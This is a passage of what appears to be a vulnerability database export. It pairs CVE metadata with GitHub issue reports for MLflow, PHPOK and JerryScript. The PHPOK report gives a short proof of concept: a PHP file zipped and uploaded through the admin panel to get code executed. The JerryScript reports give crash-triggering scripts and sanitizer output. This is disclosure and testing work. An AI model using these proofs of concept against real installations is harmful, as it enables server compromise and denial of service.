"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/mlflow/mlflow/issues/7166"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/mlflow/mlflow/issues/7166#issuecomment-1541543234"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/mlflow/mlflow/issues/7166"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/mlflow/mlflow/issues/7166#issuecomment-1541543234"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E8083039-5842-4214-A757-1A798CA15C30",
"versionEndExcluding": "2.0.1",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"22"
] | 22 | https://github.com/mlflow/mlflow/issues/7166#issuecomment-1541543234 | [
"Issue Tracking"
] | github.com | [
"mlflow",
"mlflow"
] | **Vulnerability details**
Local file inclusion in the MLFlow server, additional details may be provided upon request.
**MLFlow version**
Reproduced in 1.26.1 and 1.30.0 | [BUG] Security Vulnerability | https://api.github.com/repos/mlflow/mlflow/issues/7166/comments | 10 | 2022-10-26T07:09:54Z | 2023-05-11T07:53:56Z | https://github.com/mlflow/mlflow/issues/7166 | 1,423,542,761 | 7,166 | 5,115 |
CVE-2021-34076 | 2023-05-11T12:15:09.070 | File Upload vulnerability in PHPOK 5.7.140 allows remote attackers to run arbitrary code and gain escalated privileges via crafted zip file upload. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/HolaAsuka/CVE/issues/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/HolaAsuka/CVE/issues/1"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:phpok:phpok:5.7.140:*:*:*:*:*:*:*",
"matchCriteriaId": "6394DEF4-4A1B-4B3F-A7B9-8A0D87FDEB33",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/HolaAsuka/CVE/issues/1 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"HolaAsuka",
"CVE"
] | File Upload vulnerability in PHPOK 5.7.140
## PoC
Enter the background and switch to development mode in the upper right corner

Click Install Application - Import and upload a zip-compressed php file
```php
# 1.php
<?php phpinfo();?>
```

After easily completing the upload, visit the path `_app/` and find what we uploaded
![Uploading 3.jpg…]()
**This creates a serious file upload vulnerability**
## Analysis
The upload first calls the zip function without any censorship or filtering of its contents, thus resulting in an arbitrary file upload
```
/**
* 制作压缩包
* @参数 $dir,支持单个文件,目录及数组
* @参数 $saveName,保存的ZIP文件名
**/
public function zip($dir, $saveName)
{
if(@!function_exists('gzcompress')){
return false;
}
ob_end_clean();
$filelist = array();
if(is_array($dir)){
$filelist = $dir;
}else{
if(!file_exists($dir)){
return false;
}
if(is_file($dir)){
$filelist = array($dir);
}else{
$this->filelist($filelist,$dir);
}
}
if(count($filelist) < 1){
return false;
}
if(class_exists('ZipArchive')){
$obj = new ZipArchive();
$obj->open($saveName,ZipArchive::OVERWRITE|ZipArchive::CREATE);//创建一个空的zip文件
foreach($filelist as $file){
if(!file_exists($file) || !is_file($file)){
continue;
}
$name = substr($file,strlen($this->dir_root));
$obj->addFile($file,$name);
}
$obj->close();
return true;
}
foreach($filelist as $file){
if(!file_exists($file) || !is_file($file)){
continue;
}
$fd = fopen($file, "rb");
$content = @fread($fd, filesize($file));
fclose($fd);
$file = substr($file, strlen($this->dir_root));
if(substr($file, 0, 1) == "\\" || substr($file, 0, 1) == "/"){
$file = substr($file, 1);
}
$this->addFile($content, $file);
}
$out = $this->file();
$fp = fopen($saveName, "wb");
fwrite($fp, $out, strlen($out));
fclose($fp);
}
```
After uploading the zip, unzip was called to decompress it, again without any filtered review content
```
public function unzip($file,$to='')
{
if(class_exists('ZipArchive')){
$zip = new ZipArchive;
$zip->open($file);
$zip->extractTo($to);
$zip->close();
return true;
}
...
``` | File Upload vulnerability in PHPOK 5.7.140 | https://api.github.com/repos/HolaAsuka/CVE/issues/1/comments | 0 | 2023-05-09T08:39:43Z | 2023-05-09T08:41:57Z | https://github.com/HolaAsuka/CVE/issues/1 | 1,701,618,743 | 1 | 5,116 |
CVE-2023-31913 | 2023-05-12T14:15:09.773 | Jerryscript 3.0 *commit 1a2c047) was discovered to contain an Assertion Failure via the component parser_parse_class at jerry-core/parser/js/js-parser-expr.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/5061"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/5061"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jerryscript:jerryscript:3.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B1A23519-19ED-4F75-9CAA-42057F88EDE5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"617"
] | 617 | https://github.com/jerryscript-project/jerryscript/issues/5061 | [
"Exploit",
"Vendor Advisory"
] | github.com | [
"jerryscript-project",
"jerryscript"
] | ###### JerryScript revision
Commit: https://github.com/jerryscript-project/jerryscript/commit/1a2c04763aba49f52b1537acd3730098c873511c
Version: v3.0.0
###### Build platform
Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)
###### Build steps
```sh
python ./tools/build.py --clean --debug --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --compile-flag=-fsanitize=address --compile-flag=-g --strip=off --lto=off --error-messages=on --system-allocator=on --logging=on --line-info=on --stack-limit=20
```
###### Test case
```javascript
// poc.js
class v0 { v1 = class v2 { } }
```
###### Execution steps & Output
```sh
$ ./jerryscript/build/bin/jerry poc.js
ICE: Assertion 'context_p->scope_stack_size == PARSER_MAXIMUM_DEPTH_OF_SCOPE_STACK' failed at jerryscript/jerry-core/parser/js/js-parser-expr.c(parser_parse_class):1068.
Error: JERRY_FATAL_FAILED_ASSERTION
Aborted
```
Credits:
@Ye0nny, @EJueon of the seclab-yonsei. | Assertion 'context_p->scope_stack_size == PARSER_MAXIMUM_DEPTH_OF_SCOPE_STACK' failed at jerryscript/jerry-core/parser/js/js-parser-expr.c(parser_parse_class):1068. | https://api.github.com/repos/jerryscript-project/jerryscript/issues/5061/comments | 0 | 2023-04-06T10:46:13Z | 2024-11-22T09:11:34Z | https://github.com/jerryscript-project/jerryscript/issues/5061 | 1,657,176,424 | 5,061 | 5,118 |
CVE-2023-31914 | 2023-05-12T14:15:09.807 | Jerryscript 3.0 (commit 05dbbd1) was discovered to contain out-of-memory issue in malloc. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/5071"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/5071"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jerryscript:jerryscript:3.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B1A23519-19ED-4F75-9CAA-42057F88EDE5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"770"
] | 770 | https://github.com/jerryscript-project/jerryscript/issues/5071 | [
"Exploit",
"Vendor Advisory"
] | github.com | [
"jerryscript-project",
"jerryscript"
] | ###### JerryScript revision
Commit: https://github.com/jerryscript-project/jerryscript/commit/05dbbd134c3b9e2482998f267857dd3722001cd7
Version: v3.0.0
###### Build platform
Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)
###### Build steps
```sh
python ./tools/build.py --clean --debug --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --compile-flag=-fsanitize=address --compile-flag=-g --strip=off --lto=off --error-messages=on --system-allocator=on --logging=on --line-info=on --stack-limit=20
```
###### Test case
<details><summary>testcase</summary>
<p>
```javascript
var r = new Int32Array ( 8 ) . sort ( ) ; r = new SharedArrayBuffer ( 2147483648 ) . slice ( 8 ) ; r = new Int32Array ( 128 ) . subarray ( 64 ) . sort ( d ) ; a = new Int32Array . set ( r ) ; var a ; r = r . toString ( r ) ; r . constructor = a ; set ( r ) ; assert ( a === r . toString ( 32 ) ) ;
```
</p>
</details>
```javascript
// poc1.js
var r = new SharedArrayBuffer ( 2147483648 ) . slice () ;
```
###### Execution steps & Output
```
$ ./jerryscript/build/bin/jerry poc1.js
=================================================================
==2169015==ERROR: AddressSanitizer: allocator is out of memory trying to allocate 0x80000000 bytes
#0 0x80efe65 in malloc (./jerryscript/build/bin/jerry+0x80efe65)
#1 0x825f11c in jmem_heap_alloc ./jerryscript/jerry-core/jmem/jmem-heap.c:254:10
#2 0x825f11c in jmem_heap_gc_and_alloc_block ./jerryscript/jerry-core/jmem/jmem-heap.c:291:24
#3 0x81d5463 in ecma_arraybuffer_allocate_buffer ./jerryscript/jerry-core/ecma/operations/ecma-arraybuffer-object.c:169:28
#4 0x81d7ae3 in ecma_arraybuffer_allocate_buffer_throw ./jerryscript/jerry-core/ecma/operations/ecma-arraybuffer-object.c:195:10
#5 0x81d7ae3 in ecma_builtin_arraybuffer_slice ./jerryscript/jerry-core/ecma/operations/ecma-arraybuffer-object.c:500:7
#6 0x8362abc in ecma_builtin_shared_arraybuffer_prototype_object_slice ./jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-shared-arraybuffer-prototype.c:104:10
#7 0x8362abc in ecma_builtin_shared_arraybuffer_prototype_dispatch_routine ./jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-shared-arraybuffer-prototype.inc.h:39:1
#8 0x81b94a4 in ecma_builtin_dispatch_routine ./jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1460:10
#9 0x81b94a4 in ecma_builtin_dispatch_call ./jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1489:12
#10 0x81fb6b7 in ecma_op_function_call_native_built_in ./jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1217:5
#11 0x81fa81c in ecma_op_function_call ./jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1411:16
#12 0x81fa5ce in ecma_op_function_validated_call ./jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1371:10
#13 0x82d7630 in opfunc_call ./jerryscript/jerry-core/vm/vm.c:758:5
#14 0x82d7630 in vm_execute ./jerryscript/jerry-core/vm/vm.c:5217:9
#15 0x82d4f61 in vm_run ./jerryscript/jerry-core/vm/vm.c:5312:10
#16 0x82d4c38 in vm_run_global ./jerryscript/jerry-core/vm/vm.c:286:25
#17 0x812a4e4 in jerry_run ./jerryscript/jerry-core/api/jerryscript.c:548:24
#18 0x83eac3e in jerryx_source_exec_script ./jerryscript/jerry-ext/util/sources.c:68:14
#19 0x812162c in main ./jerryscript/jerry-main/main-desktop.c:156:20
#20 0xf7be5ed4 in __libc_start_main (/lib32/libc.so.6+0x1aed4)
==2169015==HINT: if you don't care about these errors you may set allocator_may_return_null=1
SUMMARY: AddressSanitizer: out-of-memory (./jerryscript/build/bin/jerry+0x80efe65) in malloc
==2169015==ABORTING
```
---
###### Test case+
<details><summary>testcase</summary>
<p>
```javascript
var a = " 32 " ; var e = 4 ; var a = new ArrayBuffer ( 2147483648 , t ) ; Infinity ; var a = new Uint32Array ( a , e ) ; a === e ; new Int32Array ( a , e ) ; a <= e ; a = new Uint8Array ( a ) ; a = new Uint8ClampedArray ( a , e , a ) !== e ; a < e ; a >= e ; a <= e ; 0 == e !== null ; a != e ; a !== e ; false == 0 ; false == undefined === 0 ; var t = a . t ; " " === false ; " " == 0 ; " " === 0 ; false == undefined ; 0 == null ;
```
</p>
</details>
```javascript
// poc2.js
var e = 4 ; var a = new ArrayBuffer ( 2147483648 ) ; var a = new Uint32Array ( a , e ) ; new Int32Array ( a , e ) ;
```
###### Execution steps & Output+
```
$ ./jerryscript/build/bin/jerry poc2.js
=================================================================
==2170063==ERROR: AddressSanitizer: allocator is out of memory trying to allocate 0x7ffffffc bytes
#0 0x80efe65 in malloc (./jerryscript/build/bin/jerry+0x80efe65)
#1 0x825f11c in jmem_heap_alloc ./jerryscript/jerry-core/jmem/jmem-heap.c:254:10
#2 0x825f11c in jmem_heap_gc_and_alloc_block ./jerryscript/jerry-core/jmem/jmem-heap.c:291:24
#3 0x81d5463 in ecma_arraybuffer_allocate_buffer ./jerryscript/jerry-core/ecma/operations/ecma-arraybuffer-object.c:169:28
#4 0x82583e0 in ecma_typedarray_create_object_with_typedarray ./jerryscript/jerry-core/ecma/operations/ecma-typedarray-object.c:913:7
#5 0x82583e0 in ecma_op_create_typedarray ./jerryscript/jerry-core/ecma/operations/ecma-typedarray-object.c:1679:12
#6 0x81bad21 in ecma_typedarray_helper_dispatch_construct ./jerryscript/jerry-core/ecma/builtin-objects/typedarray/ecma-builtin-typedarray-helpers.c:60:22
#7 0x81ba8f4 in ecma_builtin_int32array_dispatch_construct ./jerryscript/jerry-core/ecma/builtin-objects/typedarray/ecma-builtin-int32array.c:68:10
#8 0x81b99ce in ecma_builtin_dispatch_construct ./jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1518:10
#9 0x81fc476 in ecma_op_function_construct_built_in ./jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1537:28
#10 0x81fc476 in ecma_op_function_construct ./jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1717:14
#11 0x82d7255 in opfunc_construct ./jerryscript/jerry-core/vm/vm.c:840:7
#12 0x82d7255 in vm_execute ./jerryscript/jerry-core/vm/vm.c:5236:9
#13 0x82d4f61 in vm_run ./jerryscript/jerry-core/vm/vm.c:5312:10
#14 0x82d4c38 in vm_run_global ./jerryscript/jerry-core/vm/vm.c:286:25
#15 0x812a4e4 in jerry_run ./jerryscript/jerry-core/api/jerryscript.c:548:24
#16 0x83eac3e in jerryx_source_exec_script ./jerryscript/jerry-ext/util/sources.c:68:14
#17 0x812162c in main ./jerryscript/jerry-main/main-desktop.c:156:20
#18 0xf7c77ed4 in __libc_start_main (/lib32/libc.so.6+0x1aed4)
==2170063==HINT: if you don't care about these errors you may set allocator_may_return_null=1
SUMMARY: AddressSanitizer: out-of-memory (./jerryscript/build/bin/jerry+0x80efe65) in malloc
==2170063==ABORTING
```
Credits:
@Ye0nny, @EJueon of the seclab-yonsei.
| AddressSanitizer: allocator is out of memory trying to allocate | https://api.github.com/repos/jerryscript-project/jerryscript/issues/5071/comments | 0 | 2023-04-19T11:36:46Z | 2023-04-19T11:36:46Z | https://github.com/jerryscript-project/jerryscript/issues/5071 | 1,674,723,917 | 5,071 | 5,119 |
CVE-2023-31916 | 2023-05-12T14:15:09.847 | Jerryscript 3.0 (commit 1a2c047) was discovered to contain an Assertion Failure via the jmem_heap_finalize at jerry-core/jmem/jmem-heap.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/5062"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/5062"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jerryscript:jerryscript:3.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B1A23519-19ED-4F75-9CAA-42057F88EDE5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"617"
] | 617 | https://github.com/jerryscript-project/jerryscript/issues/5062 | [
"Exploit",
"Vendor Advisory"
] | github.com | [
"jerryscript-project",
"jerryscript"
] | ###### JerryScript revision
Commit: https://github.com/jerryscript-project/jerryscript/commit/1a2c04763aba49f52b1537acd3730098c873511c
Version: v3.0.0
###### Build platform
Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)
###### Build steps
```sh
python ./tools/build.py --clean --debug --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --compile-flag=-fsanitize=address --compile-flag=-g --strip=off --lto=off --error-messages=on --system-allocator=on --logging=on --line-info=on --stack-limit=20
```
###### Test case
```javascript
// poc.js
( async ( ) => { for await ( const b of n ) { continue ;
```
###### Execution steps & Output
```
$ ./jerryscript/build/bin/jerry poc.js
^
Unhandled exception: SyntaxError: Unexpected end of input [poc.js:2:1]
ICE: Assertion 'JERRY_CONTEXT (jmem_heap_allocated_size) == 0' failed at jerryscript/jerry-core/jmem/jmem-heap.c(jmem_heap_finalize):108.
Error: JERRY_FATAL_FAILED_ASSERTION
Aborted
```
###### Backtrace
```
#0 0xf7fcfd99 in __kernel_vsyscall ()
#1 0xf7ca4276 in raise () from /lib32/libc.so.6
#2 0xf7c8c3f7 in abort () from /lib32/libc.so.6
#3 0x083ecca3 in jerry_port_fatal (code=JERRY_FATAL_FAILED_ASSERTION) at jerryscript/jerry-port/common/jerry-port-process.c:29
#4 0x08260d02 in jerry_fatal (code=JERRY_FATAL_FAILED_ASSERTION) at jerryscript/jerry-core/jrt/jrt-fatals.c:63
#5 0x08260d64 in jerry_assert_fail (assertion=0x84351c0 <str> "JERRY_CONTEXT (jmem_heap_allocated_size) == 0", file=0x8435220 <str> "jerryscript/jerry-core/jmem/jmem-heap.c", function=0x84352a0 <__func__.jmem_heap_finalize> "jmem_heap_finalize", line=108) at jerryscript/jerry-core/jrt/jrt-fatals.c:83
#6 0x0825ef5f in jmem_heap_finalize () at jerryscript/jerry-core/jmem/jmem-heap.c:108
#7 0x0825eab1 in jmem_finalize () at jerryscript/jerry-core/jmem/jmem-allocator.c:171
#8 0x08128c76 in jerry_cleanup () at jerryscript/jerry-core/api/jerryscript.c:240
#9 0x08122416 in main (argc=<optimized out>, argv=<optimized out>) at jerryscript/jerry-main/main-desktop.c:264
```
Credits:
@Ye0nny, @EJueon of the seclab-yonsei.
| Assertion 'JERRY_CONTEXT (jmem_heap_allocated_size) == 0' failed at jerryscript/jerry-core/jmem/jmem-heap.c(jmem_heap_finalize):108. | https://api.github.com/repos/jerryscript-project/jerryscript/issues/5062/comments | 0 | 2023-04-06T13:12:15Z | 2024-11-22T09:13:35Z | https://github.com/jerryscript-project/jerryscript/issues/5062 | 1,657,404,755 | 5,062 | 5,120 |
CVE-2023-31918 | 2023-05-12T14:15:09.890 | Jerryscript 3.0 (commit 1a2c047) was discovered to contain an Assertion Failure via the parser_parse_function_arguments at jerry-core/parser/js/js-parser.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/5064"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/5064"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jerryscript:jerryscript:3.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B1A23519-19ED-4F75-9CAA-42057F88EDE5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"617"
] | 617 | https://github.com/jerryscript-project/jerryscript/issues/5064 | [
"Exploit",
"Vendor Advisory"
] | github.com | [
"jerryscript-project",
"jerryscript"
] | ###### JerryScript revision
Commit: https://github.com/jerryscript-project/jerryscript/commit/1a2c04763aba49f52b1537acd3730098c873511c
Version: v3.0.0
###### Build platform
Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)
###### Build steps
```sh
python ./tools/build.py --clean --debug --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --compile-flag=-fsanitize=address --compile-flag=-g --strip=off --lto=off --error-messages=on --system-allocator=on --logging=on --line-info=on --stack-limit=20
```
###### Test case
```javascript
// poc.js
class C { async#* method (
```
###### Execution steps & Output
```
$ ./jerryscript/build/bin/jerry poc.js
ICE: Assertion 'context_p->next_scanner_info_p->type == SCANNER_TYPE_FUNCTION' failed at jerryscript/jerry-core/parser/js/js-parser.c(parser_parse_function_arguments):1587.
Error: JERRY_FATAL_FAILED_ASSERTION
Aborted
```
###### Backtrace
```
#0 0xf7fcfd99 in __kernel_vsyscall ()
#1 0xf7ca4276 in raise () from /lib32/libc.so.6
#2 0xf7c8c3f7 in abort () from /lib32/libc.so.6
#3 0x083ecca3 in jerry_port_fatal (code=JERRY_FATAL_FAILED_ASSERTION) at jerryscript/jerry-port/common/jerry-port-process.c:29
#4 0x08260d02 in jerry_fatal (code=JERRY_FATAL_FAILED_ASSERTION) at jerryscript/jerry-core/jrt/jrt-fatals.c:63
#5 0x08260d64 in jerry_assert_fail (assertion=0x84433e0 <str> "context_p->next_scanner_info_p->type == SCANNER_TYPE_FUNCTION",
file=0x8442ec0 <str> "jerryscript/jerry-core/parser/js/js-parser.c",
function=0x8443440 <__func__.parser_parse_function_arguments> "parser_parse_function_arguments", line=1587)
at jerryscript/jerry-core/jrt/jrt-fatals.c:83
#6 0x0827592c in parser_parse_function_arguments (context_p=0xffffcd30, end_type=<optimized out>)
at jerryscript/jerry-core/parser/js/js-parser.c:1587
#7 0x0827240a in parser_parse_function (context_p=<optimized out>, status_flags=<optimized out>) at jerryscript/jerry-core/parser/js/js-parser.c:2685
#8 0x08399b84 in lexer_construct_function_object (context_p=0xffffcd30, extra_status_flags=34717702)
at jerryscript/jerry-core/parser/js/js-lexer.c:2695
